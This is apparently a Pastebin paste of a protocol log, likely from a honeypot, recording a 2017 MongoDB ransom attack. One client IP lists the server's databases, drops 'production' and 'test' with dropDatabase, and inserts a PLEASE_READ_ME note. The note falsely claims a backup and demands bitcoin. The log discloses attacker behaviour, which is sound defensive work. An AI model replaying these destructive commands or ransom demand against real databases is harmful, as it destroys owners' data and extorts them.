Advertisement
Plazmaz

MongoDB Attacker: mongobackup7@sigaint.org

Jan 18th, 2017
555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.73 KB | None | 0 0
  1. 2017-01-19T02:22:43.031Z] ::ffff:198.211.119.112:43556 -> Server:
  2. [2017-01-19T02:22:43.031Z] admin.$cmd
  3. [2017-01-19T02:22:43.031Z] Query: [{"ismaster":1,"client":{"driver":{"name":"PyMongo","version":"3.4.0"},"os":{"type":"Linux","name":"Ubuntu 16.04 xenial","architecture":"x86_64","version":"4.4.0-59-generic"},"platform":"CPython 2.7.12.final.0"}}]
  4. Return Fields: [{"ismaster":1,"client":{"driver":{"name":"PyMongo","version":"3.4.0"},"os":{"type":"Linux","name":"Ubuntu 16.04 xenial","architecture":"x86_64","version":"4.4.0-59-generic"},"platform":"CPython 2.7.12.final.0"}}]
  5.  
  6. [2017-01-19T02:22:43.032Z] Server -> ::ffff:198.211.119.112:43556:
  7. [2017-01-19T02:22:43.032Z] Flags: 8
  8. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-19T02:22:43.032Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
  9.  
  10. [2017-01-19T02:22:43.416Z] ::ffff:198.211.119.112:43898 connected.
  11. [2017-01-19T02:22:43.417Z] ::ffff:198.211.119.112:43898 -> Server:
  12. [2017-01-19T02:22:43.417Z] admin.$cmd
  13. [2017-01-19T02:22:43.417Z] Query: [{"ismaster":1,"client":{"driver":{"name":"PyMongo","version":"3.4.0"},"os":{"type":"Linux","name":"Ubuntu 16.04 xenial","architecture":"x86_64","version":"4.4.0-59-generic"},"platform":"CPython 2.7.12.final.0"}}]
  14. Return Fields: [{"ismaster":1,"client":{"driver":{"name":"PyMongo","version":"3.4.0"},"os":{"type":"Linux","name":"Ubuntu 16.04 xenial","architecture":"x86_64","version":"4.4.0-59-generic"},"platform":"CPython 2.7.12.final.0"}}]
  15.  
  16. [2017-01-19T02:22:43.418Z] Server -> ::ffff:198.211.119.112:43898:
  17. [2017-01-19T02:22:43.418Z] Flags: 8
  18. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-19T02:22:43.418Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
  19.  
  20. [2017-01-19T02:22:43.589Z] ::ffff:198.211.119.112:43898 -> Server:
  21. [2017-01-19T02:22:43.589Z] admin.$cmd
  22. [2017-01-19T02:22:43.589Z] Flags: [object Object]
  23. Query: [{"listDatabases":1}]
  24. Return Fields: [{"listDatabases":1}]
  25.  
  26. [2017-01-19T02:22:43.591Z] Server -> ::ffff:198.211.119.112:43898:
  27. [2017-01-19T02:22:43.591Z] Flags: 8
  28. Documents: [{"databases":[{"name":"local","sizeOnDisk":83886080,"empty":false},{"name":"production","sizeOnDisk":83886080,"empty":false},{"name":"admin","sizeOnDisk":83886080,"empty":false},{"name":"test","sizeOnDisk":1,"empty":true}],"totalSize":251658240,"ok":1}]
  29.  
  30. [2017-01-19T02:22:43.701Z] ::ffff:198.211.119.112:43556 -> Server:
  31. [2017-01-19T02:22:43.701Z] admin.$cmd
  32. [2017-01-19T02:22:43.701Z] Query: [{"ismaster":1}]
  33. Return Fields: [{"ismaster":1}]
  34.  
  35. [2017-01-19T02:22:43.702Z] Server -> ::ffff:198.211.119.112:43556:
  36. [2017-01-19T02:22:43.702Z] Flags: 8
  37. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-19T02:22:43.702Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
  38.  
  39. [2017-01-19T02:22:43.764Z] ::ffff:198.211.119.112:43898 -> Server:
  40. [2017-01-19T02:22:43.765Z] production.$cmd
  41. [2017-01-19T02:22:43.765Z] Flags: [object Object]
  42. Query: [{"dropDatabase":1}]
  43. Return Fields: [{"dropDatabase":1}]
  44.  
  45. [2017-01-19T02:22:43.775Z] Server -> ::ffff:198.211.119.112:43898:
  46. [2017-01-19T02:22:43.775Z] Flags: 8
  47. Documents: [{"dropped":"production","ok":1}]
  48.  
  49. [2017-01-19T02:22:44.010Z] ::ffff:198.211.119.112:43898 -> Server:
  50. [2017-01-19T02:22:44.010Z] test.$cmd
  51. [2017-01-19T02:22:44.010Z] Flags: [object Object]
  52. Query: [{"dropDatabase":1}]
  53. Return Fields: [{"dropDatabase":1}]
  54.  
  55. [2017-01-19T02:22:44.012Z] Server -> ::ffff:198.211.119.112:43898:
  56. [2017-01-19T02:22:44.012Z] Flags: 8
  57. Documents: [{"dropped":"test","ok":1}]
  58.  
  59. [2017-01-19T02:22:44.184Z] ::ffff:198.211.119.112:43898 -> Server:
  60. [2017-01-19T02:22:44.184Z] PLEASE_READ_ME.$cmd
  61. [2017-01-19T02:22:44.185Z] Query: [{"insert":"PLEASE_READ_ME","ordered":true,"documents":[{"info":"Your DB is Backed up at our servers, to restore send 0.1 BTC to the Bitcoin Address then send an email with your server ip","Bitcoin Address":"1AwkbxDziATSXAbqkLhrqCSsqvGr3PHgjU","amount":"0.1 BTC (~$80)","_id":"588022f46d3d6915101f9dc1","Email":"mongobackup7@sigaint.org"}]}]
  62. Return Fields: [{"insert":"PLEASE_READ_ME","ordered":true,"documents":[{"info":"Your DB is Backed up at our servers, to restore send 0.1 BTC to the Bitcoin Address then send an email with your server ip","Bitcoin Address":"1AwkbxDziATSXAbqkLhrqCSsqvGr3PHgjU","amount":"0.1 BTC (~$80)","_id":"588022f46d3d6915101f9dc1","Email":"mongobackup7@sigaint.org"}]}]
  63.  
  64. [2017-01-19T02:22:44.256Z] Server -> ::ffff:198.211.119.112:43898:
  65. [2017-01-19T02:22:44.257Z] Flags: 8
  66. Documents: [{"ok":1,"n":1}]
  67.  
  68. [2017-01-19T02:22:44.419Z] ::ffff:198.211.119.112:43556 disconnected.
  69. [2017-01-19T02:22:44.427Z] ::ffff:198.211.119.112:43898 disconnected.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement